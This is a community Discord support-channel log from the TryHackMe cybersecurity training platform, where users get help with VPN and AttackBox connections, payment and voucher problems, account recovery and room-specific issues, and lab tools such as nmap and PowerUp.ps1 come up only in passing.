#site-support

You should be using the Communities edition - #site-support message

Hi @west chasm
Am i allowed to make video walktroughs and upload them on youtube?

The one you tagged is the bot.

To my knowledge, you can do so. The only ask is to not give out the flags and for those challenge rooms that have been recently released, you have to wait for 72 hours to paas before releasing or publishing walkthroughs.

@ivory spruce thank you

Gave +1 Rep to @ivory spruce (current: #11 - 679)

And one more thing, any intellectual property pertaining to the room are retained by TryHackMe.

Other people have.

Help! How do you pull up Windows Machines. THM sent me this Turtorial link, https://tryhackme.com/r/room/tutorial but when I do the same steps, I get a Unable to Connect error. I'm working thru the Auditing and Monitoring room and I'm on Task 7. Any help would be very much appreciated.

For Task 7, you access the Windows target machine using RDP
Check the screenshot using the AttackBox and an RDP client called remmina

have you started the victim machine

I'm getting this when I click Remmina... Enter password to unlock you login keyring.

Nevermind... I got it. Thanks a bunch. Is there instructions somewhere for this?

I'm started the AttackBox and clicked the Start Machine within the Task

yeah but you also have to start the victim machine. There'll be a little green box somewhere on one of the tasks.

that's how you get the right IP to connect to

for RDP

I do not think you will find a room or a section about remmina or RDP
I think you will get instructions about using these tools as you go through other rooms For instance, this room "Windows PrivEsc" will showcase another RDP tool called xfreerdp (see screenshot) as part of starting the room
So, my view is that you should accumulate these nuggets as you go along, complementing it with googling
You can also learn quite a few things by watching streamers on Twitch/YouTube doing THM rooms, in particular rooms that you have already done yourself, as that will give you another perspective (just my 2 cents)

Hello, this 7 day streak required to access networks.. is it a one time unlock, or do i lose access if I lose the streak?

I am pretty sure you will lose the access if you lose the streak
I guess you know that the 7-day streak is a requirement only for free users

ah yes, just searched through discord chats 3 mins ago and realized that.... then this shouldnt be an issue, thanks 🙂

Yep, that's in the task. I started both machines.

Thanks, this is help. I pretty furstarted with this tho as when I meet with THM, they did not mention this and they also said they had live help.

Gave +1 Rep to @upbeat quarry (current: #60 - 128)

THM Educators who are Admins on their account... Can you tell me how to apply a token to an existing account?

I had some follow up questions on a previous question of mine that I had asked a couple days back. So I understand (as Scrubz said) that its possible for a network to be modified and might not be in the clean state when you work on it.

So...

1. Are regular machines guaranteed to be cleaned? Like when a normal room is terminated, is it actually fully cleaned for the next user? I can't check it myself since a different IP etc is assigned so hard to say if the same "machine" is getting assigned to me
2. So in a network, how do I know as a newbie if I am missing something and lack the knowledge or if the machine's vulnerability has been removed/vandalized.
3. If... 5 users are not doing that network rn, and that network is kind of messed up, how can I get a reset?

For a regular room (not a network), the target machine is newly instantiated whereas for network rooms, it is usually shared among a few users so things can persist in it until sufficient votes for reset are submitted or it is reset automatically (I dunno how or when that's done)

You could ask a staff member to resolve it (3rd point) or probably leaving and rejoining can do it 🤔

...to assign you to a different subnet of that network room

https://tryhackme.com/r/room/activerecon
task 6 no video at the end

that appears to be correct: no recording
searching Discord shows other users have reported that too, including under #room-bugs

Hello. I forgot to close my AB and I hit the limit of 3 x). Is there a way to see where they are? or do I have to wait the remaining time?

you may try this, although I have not used it myself:
#room-help message

@west chasm
I have a question regarding the opnevpn setup. I get “[ENETUNREACH]: Network is unreachable (fd=3,code=101)” only when uploading images, reverse shells, etc. and cannot upload them. Could you please tell me how to solve this problem? I have already tried thm-troubleshoot.

The one you tagged is the THM bot. How are you connecting to THM OpenVPN?

As the error gives out network is unreachable, it may be a problem on your ISP or the connection you are using.

ye, should i keep posting bugs like that or they dont fix it anyway?

VPN server is EU-VIP-2
I have kali-linux in my virtual box and running with “openvpn username.ovpn”. Is there any other information needed?

I am not too optimistic there would be an update now following your feedback as other users have already flagged it under #room-bugs, so I would leave it there

when you run openvpn username.ovpn, do you have a message close to the end of the output saying Initialization Sequence completed ?

yes.

2024-09-11 21:34:50 Data Channel: cipher 'AES-256-CBC', auth 'SHA512', peer-id: 0
2024-09-11 21:34:50 Timers: ping 5, ping-restart 120
2024-09-11 21:34:50 Protocol options: explicit-exit-notify 3

with that, you are connected to THM network and the target machines you can launch
it is not too clear to me in which context you have the error messages you reported: could you please provide more details (room/task, IP addresses, command), possibly with screenshots?

All the rooms I need to upload files, for example, there is thompson, I can ping, access the site, nmap, etc., but only when uploading do I get an error as shown in the screenshot.
https://x.com/kumama_nui/status/1833853569772253557

For some reason I can't post an image, so I'll use Twitter instead.

to share screenshots you have to verify with Discord

@woven mural

Thank you。
Only when uploading a file, I get an error like the one on the right.

you indicated having tried thm-troubleshoot: was it this guide https://help.tryhackme.com/en/articles/6496058-troubleshooting-openvpn-on-linux-and-mac?
I think you should consider this option: in a separate terminal window, run sudo ip link set dev tun0 mtu 1200

With the utmost gratitude, I would like to inform you that by adding tun-mtu 1200 to the file, the file upload worked successfully. It's all thanks to you. I sincerely appreciate it. I look forward to reaching out to you again if I need assistance in the future.

Gave +1 Rep to @upbeat quarry (current: #57 - 136)

thank you for the feedback: it is very useful to understand how a fix comes about
BTW, that sudo ip link set dev tun0 mtu 1200 is part of that "Troubleshooting OpenVPN" guide I linked above, in case you need a reference
have fun

Gave +1 Rep to @woven mural (current: #2218 - 1)

got a connection error

should i terminate the vm and restart it?

i fixed it i mounted something wrong and the vm crashed but didnt die

Hello, I cannot download Holo VPN access, anything I can try to get it in another way ? Server returns 504 to the download request

how can i change my country?

its turkey and i want it to be iraq

Hello people, impossible for me to download the CICD vpn configuration file from my access page in the room CI/CD and Build Security (I have a premium account), it's hanging in "Downloading Configuration file" forever. Similarly even when I am supposed to be on the correct network when I spawn my attackbox, I can't ping or telnet the gitlab's server ip address. Anyone has (had) the same issue?

similar issue for me:

• I can download the VPN config file: I can start the VPN but then I cannot ping the gitlab and jenkins servers
• usually, I solve that problem by regenerating a fresh VPN config, but as of tonight:
• the regeneration hangs for 20-30 seconds
• the "regenerated" VPN config is identical, hence useless
  conclusion: I cannot use that network for now

Ok, thx for the confirmation I am not going crazy @upbeat quarry . Will try it out again tomorrow (if still not working I will open a support ticket)

Gave +1 Rep to @upbeat quarry (current: #56 - 138)

Just saw your subs-room-help's comments, should have checked there first 😅

I cannot download the VPN file for holo either: the download process hangs for 20-30 seconds and then stops with a red error box

then you know that #ci-cd-and-build-security is also a good place for that network 🙃

guys

i cannot conect to thm vpn

seems that nothing connects

Can you share the error message you are getting?

Hi. I cannot download VPN pack for wreath room. could someone help me with this.

I couldn’t either so I left the room , then re-joined and was able to download the configuration file.

i saw this tip. but this wasnt working for me. i have rejoined mutliple times with some time gaps. still same.

why is the attack box so slow

an nmap scan is taking an hour

hiya , need help with openVPN on macos

Quick question:
When connected to THM network via OPENVPN, are you supposed to have internet access while being connected?
I ca ping 8.8.8.8 adn google stuff, but i can also attack the machines.
Im afraid I did somethign wrong and accidentally set up some kind of split tunneling?
Which I would prefer not, incase i type an IP wrong and accidently attack someone on the WWW.

Hiya - Having trouble buying vouchers, it's refused multiple cards over the past 2 days at this point - Any ideas what may be going wrong?

Hello
Im teacher for cyber school & i cannot buy voucher for my students. Paiement fails, but when i buy subscription for myself it works.

Anyone facing the same issue ?

Exact issue I'm having! Ping me if you work it out!

I just bought tryhackme voucher and money has been deducted from my account but it says Card not accepted

Yes, exact same thing. Did you manage to get it ?

How did you install OpenVPN?

That's odd. But have you got the voucher codes?

What is your complete nmap command? The target should logically be on the same network as the Attackbox. Also, what room are you working on?

By payment fails, at which specific step are you having an issue on?

It's OK now . I install the cli using brew . Thanks

Gave +1 Rep to @ivory spruce (current: #11 - 682)

@ivory spruce Is there a B2B support contact I should message?

Oh.. THM Support should also be your contact, but I think you'll need to mention that you are in a business plan or account so they can assign the ticket accordingly.

@tepid trench

Ah, ok, it's just that it's already the second day of this issue with no reply from that email (aside from the automated one) - I'll add that it's a business issue and see if that helps.

Please be patient and wait for their reply. If you do send another one before they do, you would be putting your ticket to the back of the queue.

If I remember correctly, the standard response time is ~1 to 3 business days these days, but I have no idea on the SLA for business or education plan or account.

Thanks for letting me know! Was about to send one!
Unfortunately this means we're already behind schedule for this course so I may have to move on without at this rate 😦
Thank you for being so patient too! I appreciate your advice and helpfulness!

Gave +1 Rep to @ivory spruce (current: #11 - 683)

Room: Network services
Command: nmap -sS [ip] -p- -vv

I know that scanning all the ports would take a while but the task requires me to do so

Hi @wind wedge , is this something you can assist with (just taking my chances here though)?

Which task are you on?

DM me your ticket number I’ll take a look 🙂

just tried again right now: same issue, not able to download VPN config file

• the download button enters spinning for about 30 seconds after pressing
• the result is that red error message box
  see 2 screenshots

Nope

6

I also tried to regenerate: failed too, with different pattern:

• the "regenerate" button spins for like 30 seconds
• then the download button spins for another 30 seconds, and ends without that red error message
  See additional 2 screenshots
  Leaving and joining back has been tried multiple times, with no help

hello, while copying an answer, I forgot half of my solution. As a result, I validated anyway.

I have the same issue: not possible to download Wreath VPN configuration
Did the same troubleshooting with leaving /joining with different time gaps
The download button spins for like 30 seconds, and ends up with an error message in a red pop-up Same thing when regenerating except for the red pop-up
See screenshots
End result: no downloading
Anybody can help?

same problem

I have checked on Holo network: same problem with same symptoms (@hard frigate reported that too yesterday)

need help with slingshot room in SOC 2 path.
after entering creds the page keeps showing :
Elastic did not load properly. Check the server output for more information.
I tried with different ip but nothing, i redownloaded another vpn config file but didn't work.
connection is established by checking 10.10.10.10.
Can someone check first ?

scanning all ports on that box indeed takes some time
did you find port(s) open?

it took so long that my attack box expired 💀

was that the 1-hour per day AttackBox? If not, as a sub, you can extend the machine timer repeatedly
can you share the nmap syntax you used?

nmap -sS [ip] -p- -vv

I am just redoing that task now, and indeed it takes way too long with a command equivalent to yours: see screenshot
I have stopped that scan after 20 minutes at 22% completion with another 46 minutes to go
By that time, no port had been reported open
Then I restarted the same nmap command as non-root user, and the result came back nearly instantaneously I can share a screenshot for that second scan too if you want Spoiler alert: it contains answers to some questions of Task 6
BTW, next time, it is best to address room-specific questions in #room-help

guys i got this multiple times and when i tought it was fixed i got it again "Unfortunately, your instance has been automatically terminated. Please re-start a new one. To learn more about why this happens, please refer to "

i confirm paiment with bank
Money is debited

then error message appears " paiement failed" on THM side.

I did not get refunded.

I have just tried, with the AttackBox then my local Kali VM
It worked: see screenshot done with the AttackBox
I experienced the same issue you mentioned, but that was before I landed on the login page, and then I just reloaded the page
And credentials worked OK
I guess the issue is with the target VM, that needs restarting?

Yeah exacty did login in with creds worked it was loading infinitely without result

Do send a email to THM Support for it to see if they can help. I'm not certain what they can use if only said error message appeared.

@vague nacelle

yo

how i can change the country?

Its just tied to your location, see this: #site-support message

?

but thx

If you want a country you are not currently in you could always run a VPN from said country and then hit the link

when i turn off the vpn it will not turn back?

• its my problem but how on earth ill find a vpn have iraq server

I'm pretty sure it only updates when using that specific link, not from normal use of the site

well bcz ill not find a vpn with iraq , can i make a friend log in and change the time zone by himself?

Probably?

im trying to solve the task manual discovery in content discovery

it says put your machine ip with sitemap.xml

when i do it gives me error 405

You are probably putting in the Attackbox IP and not the target IP.

sry only was that the page was bugged

So it is working now?

yeah thx

Gave +1 Rep to @ivory spruce (current: #11 - 684)

What’s a “non-root” user?

Just a normal user, "root" for linux is like the "administrator" of windows, so a non-root user is just anyone else without root perms

Would def be nice to have a friend system to see what your friends are working on, their streaks, etc

bro help me plz, i download openvpn file and run in kali linux but not connect

restart and download file again but not connect

What exactly do you mean by not connect? What is your openvpn output?

That page is broken, but your VPN should still be working

i use sudo openvpn but not conected bro T-T

What is the output of the openvpn? and perhaps see this: #site-support message

Hello, I am facing issue with subscribing to the premium pack. Please help
I was a regular subscriber for about 3 months but discontinued this month to buy the annual plan. Now, whenever I try to make the payment the tryhackme payment portal shows bank declined the transaction but the amount is deducted from my account.
From India

Do drop an email to THM Support. It might take some time as it is almost the weekend and they only work on weekdays.

@uncut cipher

I created a ticket for the same from the tryhackme site itself 4 days back (09/09/2024), haven't heard from the support team since then.

Did you submit another ticket after that one?

The site isn't allowing me, it just doesn't show the option to create a new one.

Hey guys ! I got a problem i can't use the attack machine anymore (i don't find the start button) am i the only one with this problem ?

You can always fall back on this link (see screenshot also), where you can launch either flavour of THM attack machines:
https://tryhackme.com/r/room/kali

Thank you guys !

Please note that some rooms may not have the "Start AttackBox" button, like "Linux Fundamentals 1" at https://tryhackme.com/r/room/linuxfundamentalspart1, because the target machine opens in Split View for you to practice directly without the need for the AttackBox

@ivory spruce

Any reason it just freezes everytime after ../PowerUp.ps1?

Try .\PowerUp.ps1

Did you receive a ticket number?

We’ve received a high volume amount of tickets and will be able to get to you when we can 🙏

yes, want me to share it?

Thanks for the update.

Gave +1 Rep to @wind wedge (current: #51 - 153)

No need, @wind wedge here provided an update that their team will get to your ticket. Please wait until sometime next week as they don't work on weekends. You don't have to worry about the lost time since your payment as they will only start your subscription once they have looked at or sorted it.

Or probably

.. .\PowerUp.ps1 ?

Hello TryHackMe Team, it’s been a long time i didn’t login into the site, and i think you recently change how username nickname fullname works. When i log back on, i’ve seen that a new random username was set, but when i want to change it back to the older one, the site tell me that it’s not available (which is hold be me ..) so I’m stuck with a different username 🥲

Will wait for that follow up.

For the previous transactions I talked with my bank and got the money back but just now I tried with another card, It showed me an error "The authorized amount ($14) is less than collectable amount ($16.80)". But the amount was deducted ($14).

I am unable to share a screenshot here.

My lvls are gone :’(

How did you login? Your discord account still shows your level as 0xD God.

quick question here on a room:

https://tryhackme.com/r/room/cicdandbuildsecurity

I am trying to do this room , but I am stuck because the IP addresses of the Gitlab and Jenkins network do not seem to be correct. I am using the attack box and I started up the network, but when I ping the IP addresses listed, I get no response. Does anyone here know the fix?

No need to share. You'll need to verify your account to be able to share a screenshot.

@uncut cipher

With google account

Yeah.. try logging in with your username and password.

That’s probably an alt account, i check and i go back .. I’m so dumb

Signing in with your Google account will create a new account for you in THM (unless that is how you used to login since).

I’ve created it with google account but since I’ve setup a student account so a bit messy in my mind :/

These are the screenshots for the recent transactions (TODAY, 13/09/2024 5:20pm). First is error I got on the tryhackme portal. second is the amount was deducted and subscription wasn't activated.

Sorry to point this out but my previous ticket was generated on MONDAY, which is the start of the week and still no response, that is quite disappointing from the support team, at least a follow would have assured me that some action is being taken.

For your previous ticket, you mentioned it was refunded to you? Is there anything else you are waiting on THM Support for that ticket (just to clarify)?

Ok guys I have a somewhat silly question. I’m working on a project where I have scan a folder with clamav to find a malicious file. Problem the account is not in the sudoers file and I do not have the root password and it’s on a vm so I can reboot to reset pw!!!! 🤬🤬🤬 what am I missing?

can anyone answer the question I posted above about that specific room I am having issues in?

That was an alt, account recovered 😉

Can I reassign my google account ? Like deleting the old one and reassign to the correct one

The issue in the previous screenshots are serious since that is the 4th time I'm getting it and can't even report to the team.

Yeah I had to contact my bank the next day to get the money back, but these errors are prevalent. I wanted to create a new ticket but couldn't, I suppose until the team clears the previous ticket we can't create a new one.
Nothing remains on the previous ticket but let us create new ones, that's what I was trying to get to, if the previous tickets are not clear how can we create a new one?

check these screenshots.

Hello, I’m facing a problem with payment…
THM took 42US while i have not pay for anything and my next payment will be on October 1st

Is that supposed to work in a meterpreter session?
I would troubleshoot by starting a PowerShell session at a shell prompt, not a meterpreter prompt
do you have a shell session that you upgraded from to arrive to meterpreter?

I am from India.... Actually I am facing some issues regarding TRYHACKME vouchers....

My debit card got declined many times....

How can I buy try hack me premium???

I have the same problem: Gitlab and Jenkins do not respond to ping, and my understanding is that they should
that room has another problem: when you try to regenerate a VPN configuration, you end up downloading the same one all the time
you can go back to my conversation on this with @gray delta at:
#subs-room-help message
If is also worth visiting this channel dedicated to that network: #ci-cd-and-build-security
it would be good if you could report this under #room-bugs

that question is best addressed in a different channel: #general or #infosec-general

thanks I submitted it to that channel

thanks, just seen it
I'll contribute to that message with more inputs, to keep it alive, but that may have to wait till the WE
so far, I have not seen how THM formally acknowledges potential bugs, like "already known" or "never seen before"

I don't think you can as logging in using a Google account creates an entirely new THM account.

If you sent a follow up before THM Support responds, what happens is you send your ticket to the back of the queue.

Okay, I get it. But since I am a student and this issue involves money transactions, for me waiting for a day is enough time and ask for a follow up.

looking forward to get the issue solved that is tagged in

@ivory spruce

I understand where you are coming from. However, please note I'm not a member of THM Staff so there isn't much I can do but assist with initial troubleshooting and the next steps you can take.

https://i.imgur.com/1IEi13Y.png , they use this in a room as an example, so It should work in meterpreter

"To execute this using Meterpreter, I will type load powershell into meterpreter. Then I will enter powershell by entering powershell_shell:"

But yes somone mentioned that I should try ./PowerUp,ps1 instead and that worked, although In the image they use ../, same in writeups

I understand, thank you for your time, have a great day 😉

so it seems to work
BTW, in that second image you shared from the writeup they use . .\PowerUp.ps1, which I did not see you use: did that one fail too?

Any help is appreciated. And any guidance that I should follow to reach out the team in my case would also help.

I tried ../ and it wasn't working but like I said I was suggested to use ./, which worked

Hey, so I have a question. Are all the modules covered throughout all the paths? Like if I were to do all the paths, would I cover all the modules? Or are there some modules that are stand alone and are not a part of any paths? Thanks in advance

If I understood it correctly, there are modules that are not part of any learning paths currently. Case in point is the Advanced Client Side Attacks, AoC 2023 Side Quest, etc. However, the learning paths may change at a later time.

Ah thanks. Would you happen to know where I might find a list of modules not covered without manually going through every single path and module

Gave +1 Rep to @ivory spruce (current: #11 - 688)

You've already submitted a ticket so you should be fine.

I suppose this could be a nice python program to code up... hmm interesting.... most interesting....

I'll brb xD

Be aware of the public API usage.
Also, it seems to be continuously updated for new features

./ is used mainly for Linux/Unix system while Windows uses .\.

• I made this mistake twice
  Try .\PowerUp.ps1 (Make use to cd into the same directory where you stored the PowerUp file)

heyho guys, i am doing the breaching AD room. It sais it is active but i cant ping the DC with its ip.

regenerating the VPN generally solves that issue
before that, confirm thaht the Network is in the state of running

I use attack-the-box for it

plus the network state is running

can you confirm you have a breachad network interface like I have in the screenshot?

hey guys, I am connected to tryhackme's openVPN file from my side but on website it is still showing not connected. I have tried regenerating new ovpn file and connecting still facing the same issue. what to do?

#site-support message

Yes, I had, but now after waiting 20 min its somehow working. I cant tell why...

understood
the next step would have been to leave and join back after a few minutes
it is not clear to me how much time you have to wait for pings to kick in

the last thing i would have done would be to wait for the machine to run out of time xD

Could always give me the subnet and I can check the network,

I have that power 😄 mwahahaha.

if you have the choice to use your own attack machine with the VPN, as an alternative to THM AttackBox, you then have that option of regenerating the VPN config that I mentioned before
so far that trick has been very effective for me to get pings going

Hello, what’s happening with the vouchers? It keeps saying that my card is declined, and the only issue I have with my card and payments is on your website, and only when I try to purchase vouchers. My monthly subscription went through without any problems.

If you require support regarding vouchers, please use their email

I want to know If it is true,👆

@stray cove can you check this out please?

Any vouchers not from the official site are probably fake

The site is called try to hack me Vouchers on telegram

Could send maybe some official pages for vouchers?

https://tryhackme.com/subscriptions

What's the difference in buy VOUCHERS and buy annually premium?

Vouchers don't automatically renew and could be gifted afaik - though if you are just buying for yourself annual sub makes more sense

It's not working!

Hello, I am trying to log in

problem is, it is saying password is wrong. I tried resetting, but i am not geting any email

I know password is correct as it is saved on edge and i used to directly log in using that

email is also correct as i can see the spam from tryhackme

Seems like you have not started the target machine as it shows MACHINE_IP still.

I did! Just for show. The problems are that when I copy paste the lines with active machine ip, I got flag error and then I changed ',W1' instead of ':W2', it worked yet no outcomes.

Using the attackbox or own VM?

own VM Sir

the wordlists (path) might not be 100% correct then.

Yes I carefully change the name of the wordlist path. If it worked for you, I should consider to do it on attackbox again.

Its been a while since i did this room, but I dont remember any issues after correcting the wordlists paths.

Thanks man let me try it on attackbox

@weary spindle how do i see the ip that i need to open to follow a specific room

Have a read over this

this room for example

so i guess for the nmap room i can't use openvpn?

but it does give me the option to open it using attackbox

then i should be able to use openvpn as well

right?

Did you read the article he sent or the first task instructions? Yes you can use openvpn for that room

i read the article
i've set up openvpn as well
what i'm having trouble with is what do i do now to access a room like this

like what IP do i write in my VM's browser to do the room's stuff now that i have it setup

i think i'm not able to articulate my issue properly
this is all fine
i've started the task machine and everything

but i want to do the room's stuff in my VM

and i've set up thm's openvpn on the VM as well

If you start the task machine it will give you the IP to access it from your own VM

how do i access the IP though?

Depends on the room, for that one via the command line with nmap

with ssh?

Not for that room, no

how do i do that

this is the part i need help with

If you don't understand how to interact with the room even after reading the task information then perhaps you should take a step back and go through some of the introduction learning paths like introduction to cyber security

i've done them
i'm actually really new to cybersecurity
i finished pre-security and introduction to cybersecurity
and this is pretty much all the training i've ever done in cybersecurity

Hmm well I'm on my phone so I can't check but isn't that a walkthrough room? Shouldn't the task tell you what to do?

i have done the previous rooms with the attackbox

i'm just not sure how to interact in the same way using openvpn

It's the same thing, just use the terminal or whatever like you did on the attackbox

oh

i was thinking i had to do something really complicated to be accessing the machines all this time

Nope, just the VPN and you are good to go

another thing was this saying that i need to deploy this machine if i am using attackbox

i took that as if i am using openvpn, i can't just deploy the machine and instead have to do some kind of complicated setup

Ah no, so there will generally be two machines the victim machine (green button) and the attackbox (blue button), you will always need to launch the victim machine but if you are using your own VM you just ignore the attackbox

can i write everything i would write in the attackbox, without any changes, like changing the victim machine ip into my VM?

every command is exactly the same for my own VM?

Pretty much, though for something like a rev shell you would need to know your IP for your VM instead of the attsckbox's IP - concepts are all the same though

alright, thanks for helping out with it
i know these were really dumb questions, but i'm really new to learning cybersecurity, so these concepts were a little confusing to me

No worries

hi, why show incorrect answer on question?

You are asked to test an application but are not given access to its source code - what testing process is this? - Black-box Testing
You are asked to test a website, and you are given access to the source code - what testing process is this? - White-box Testing

what is wrong in answer on room???

You are mostly correct you just have the formatting of the answer a bit wrong ||Black Box|| and ||White Box|| is what it is looking for - you can roughly see the desired format of the answer by looking at the *'s within the answer box, each one represents a letter and the spaces are also clearly shown you so know how many words and/or letters your answer should be.

do you know what's happening?

Which vpn server is this?

wdym?

from thm

oh okay

now its okay

idk what happened

hmm strange

Its working now though?

yes

Well that's good

yeap

hi, I haven't been able to download the ovpn config file since yesterday. after clicking "Download configuration file", it loads for a while before showing the error message "An unknown error has occurred". is there any way I can resolve this? thanks!

For the normal VPN or one of the network ones?

the normal VPN, from https://tryhackme.com/r/access > Machines (https://ibb.co/HD2hS2x)

Hi all, I trying to connect with THM using Openvpn, but i am getting the following errors. I regeneated the ovpn files and tried it

I think the VPN connection status indicator on the site is broken. My VPN service says I'm connected and I can see that I have an IP but the connection status on the site says I'm disconnected.

how to remove root perms

Have you tried to reconnect?

Yes, THM staff are aware and it is already being looked into.

You could put that in #feedback-and-ideas

There is a friend list.

Haven't tried that one yet so I have no idea what a user may have visibility on as far as a friend's progress is concerned. 😅

You see their score, streak and the last room they joined.

Here's your answer then @cerulean oracle

Gave 1 Rep to .scrubz. (current: #1 - 2754)

Ah ty

I am doing file inclusion room , the lab playground (&&I am unable to solve that can anyone help)

Hi, I can't download the hololive ovpn. The other ones work (both Networks and Machines). I always get "An unknown error has occurred". Same with the button "Regenerate" when hololive is selected.

#holo-network message

thx

Gave +1 Rep to @upbeat quarry (current: #50 - 155)

Hey, i am having problems connecting to vpn. i can load 10.10.10.10 and see the flag, but its doesnt show as connected on THM website. Help pls

Check the pinned posts.

thx

Gave +1 Rep to @weary spindle (current: #1 - 2758)

Hi I need help with voucher, I bought a voucher yesterday and already tried to email the support (the instruction in the pinned comment) and still no response. I have not yet receive my voucher code yet. If anyone has any idea what to do that would be great. Thanks!

Is it agaisnt thm tos to post screenshots of what we are doing on our GitHub portfolios?

Either you have poor connection or port on which vpn connects is down.

try changing vpn config file if you have eu1 try eu2

I fixed it

hello

Hello

??

Hello, website seems to be down...is it the case for me or everyone else?

i guess I am also \

facing the same

the website is down

Now it is fine !!

Does anyone know what the issue could be, Im currently doing the metasploit series but cant get the reverse shells to work when using my vm but using the attacker box it works fine

If you are using your VM, did you connect via THM OpenVPN?

yes strangely I used to be able to use any vpn configuration file now only US and IN is connecting - when I go to 10.10.10.10 it says im connected

Anyone experiencing issues with redteamcapstonechallenge VPN server configuration file?

Anytime I am trying to download a config file, I will get "An Unknown error has occurred".

The room says that AttackBox should be able to connect to Capstone challenge, but no luck there either.

just out of curiosity, how the points are calculated per questions? i know challenges have more points, but why do i solve all the questions yet someone solves the same and gets more points?

check the link below

@narrow rapids

I can download the VPN configuration, but I cannot regenerate it: the regenerate button spins for like 30 seconds, and then the next download creates the same VPN file
About the AttackBox, because of a current issue, you have to use the VPN too You can see evidence of that issue: /root/Desktop/NetworkConfigs/redteamcapstonechallenge.ovpn is empty

This is what worked for me eventually:
So, when I tried to Download OpenVPN configuration file for Capstone network, I would get "Unknown error message".
I also tried THM Attack Box, which should have access to Capstone network, but no luck there either.

Troubleshooting:
Reset progress of the room
Leave room
Join the room again (DO NOT press START button)
Go to THM Access section and Capstone VPN configuration file should download just fine now
Start the Capstone Network
Happy hacking

thanks for the feedback
with that, can you nmap boxes on the network?

Gave +1 Rep to @finite dune (current: #2220 - 1)

on THM AttackBox, the interface for LHOST with reverse shell is ens5
with the VPN, the interface for LHOST with reverse shells is tun0

Yes, I just runed nmap on all 3 machines on the Capstone network and got back results.
Make sure you use -Pn as they are Windows machines and do not respond to Ping scan.
Also good idea to run nmap with sudo priviledges.

done that: -Pn and as root, for all 3 machines with an IP when the network starts (X.X.X.11-13), but nothing for 30 minutes
I'll leave the network and join back in 30-60 minutes
about resetting the progress, it seems you have to wait for 5 users to vote for the reset

Regarding to Reseting the progress and leaving the room - see under the name of the room, you have buttons, one button says OPTIONS. Under Options you can reset the progress and Leave the room.

Hello there, I am trying to use Wazuh server but it kept showing "The connection has timed out" I waited more than 5 minutes before accessing the link..

NEED HELP
my tryhackme is not connecting with open vpn i downloaded configuration file also regenerated 3 times but it is not connecting few days ago everything was okay now don't know what happned

Is the markdown really needed?

Can you screenshot?

Which server are you trying?

Which os and where do you live?

firstally ind then Eu

India kali

Which EU?

i tried 1,2,3

Did you try and regen EU 3?

yes sir

Can you verify and screenshot?

yah sure wait 1 minute

Is this eu3?

na this is not this is 1

same for eu 3

Ok, delete it,.regen eu3 then download.

i tried now

did but same

server status online connection not connected

Ignore the access page.

What does the VPN output say?

..

same and just keep stopping there

Ok, reboot your virtual machine

okay

did but same

@upbeat quarry still having the slingshot room problem i have tried to contact support but nothing

last time, did it work in the end or not?

nope

are you on THM AttackBox or on the VPN with your own VM?

vpn

it might work with attackbox idk didn't try

I have just went back on Discord to our previous conversation, and when I tried I used the AttackBox
if you have the option of the Attackbox, you are removing the VPN from the list of potential issues

i do let me try first

Can anyone give me a free try hack me premium subscription.

it will be a big help

i finished mine today

@upbeat quarry bruuuuh it works LOL

and it's faster

but i don't see the issue using vpn

if you're a student you get 20% off using institutionnal email

ok. let's look at the VPN issue
first of all, the AttackBox through your browser is on the same THM network as the target machines
with the VPN, you have to go over the internet for each interaction with the target machine
do you always have issues with the VPN, or only with Slingshot?

only machines that have elastic

i've continued the path and found out the same problem in : Threat Intelligence for SOC

when i deployed the machine

it would be interesting if you have the chance to try "simpler" machines, like the ones of "Network Services" or "Network Services 2", which are not as heavy as elastic machines
in that context, I am sending you a link for troubleshooting VPN just below

@fallen garden

ok thanks i'll try this

Hello
Is the ERROR normal ? But at the same time Gobuster found what I was looking for so I don't know..
I am working on OpenVPN, Kali - Upload Vulnerabilities Room
' context deadline exceeded (Client.Timeout exceeded while awaiting headers) '

@naive dust reduce threads

do like 3 or 4 using -t thread_value

Oki thank you

Gave +1 Rep to @fallen garden (current: #2220 - 1)

I need help recovering my iCloud account I can’t remember my password

Apple can.

Hi, how long is the process for my write-up to be accepted in a room ? Because the submission mail redirects me to /room/manage but it's empty over there 🤷🏻‍♂️

Depends on the room.

Author

can someone help me?

im stuck at the windows room

investigating windows

just ask what you want

what?

State your issue,

i cant find this one:At what date did the compromise take place?

look for the earliest date of the supicious events.

Hey, I cant login into my account because I lost access to the Authenticator app on my old phone (which I reset without transfering it on my new phone). I have the recovery codes but that seems the only option to me to login into my THM account. What can I do?

Hey all,

I think I've found an unintended privilege escalation vector in one of the rooms.

Who can I talk to about this?
Is this normal, should I just go about my day? 🙂

Why I think this:

• The room explicitly asks for a CVE ID for the PE exploit, and expects the CVE ID of the official solution (not the one I used).
• All writeups I read (6 or 7) talk only about the offical solution. None mention the exploit I found.

Having trouble pasting anything while in AttackBox. I can see content in clipboard, but nothing will paste, example can’t paste into terminal or BurpSuite. Have reset settings and made sure THM is allowed for clipboard. Not sure what to do. I don’t have this issue anywhere else but in the AttackBox. I’m using a Mac.

Hlw, I can't connect to the internet via TryHackMe virtual machine. I tried for almost 3 hours. It's not working. Please help me guys

Hey:) gz. Some of the rooms are older than newer privilege escalations, so definitely unintentional. However, consider this a "bonus" if it's not part of the intended path:)

Hello 👋 you'll need to contact support to help with recovering your account. The recovery codes for 2FA should work so that you can remove it and attach another, but if it doesn't, contact support(at)tryhackme.com they'll be able to help out 🙂

If I recall correctly, things like the AB take the shortcut that's local on the machine (I.e. AttackBox). I.e. Ctrl + V (off the top of my head). Mac OFC uses Command + V (you might need to use Cmd + Shift + V on your mac for it to translate?). Give either of those a try

The VMs in rooms (or the AttackBox if you're not a subscriber) do not have internet access. This is intentional because generally speaking, exposing vulnerable machines to the internet is a bad idea 🙂

If you're trying to copy files over, you'll need to do this over the VPN network from your machine, or the AttackBox itself if you're using that (for example NC, hosting a python server, etc)

If you can see the contents in the clipboard (via the slideout tray in the attackbox view), then it's very likely just a thing of not pressing the correct shortcut on the keyboard. Worth testing to see if you can go to say Terminal and in the tabs manually press the Paste button - verify that the clipboard contents are visible and can be transferred

hi Ben

hello 🙂

i have premium subscription. I can access internet via attack box, but not in TryHackMe virtual machine

I understand - thanks for clarifying. Okay yup, so that's intentional

With a subscription, your AttackBox can access the internet, but the machines you deploy in a room (i.e. via the "Start Machine" button in the tasks) do not - even if you have a subscription

This is because they are generally and intentionaly vulnerable, and again, exposing them to the internet is quite a bad idea 😅

For example, a vulnerable web application or service on a port 🙂

if I can't access then how can I reply the questions ?

You pretty much shouldn't need to access the internet via that machine to answer questions. Granted, you might need to access the internet on your device itself sometimes.

What room, task and question are you doing?

Threat Intelligence Tools> Scenario 1 https://tryhackme.com/r/room/threatinteltools

Ahhhh

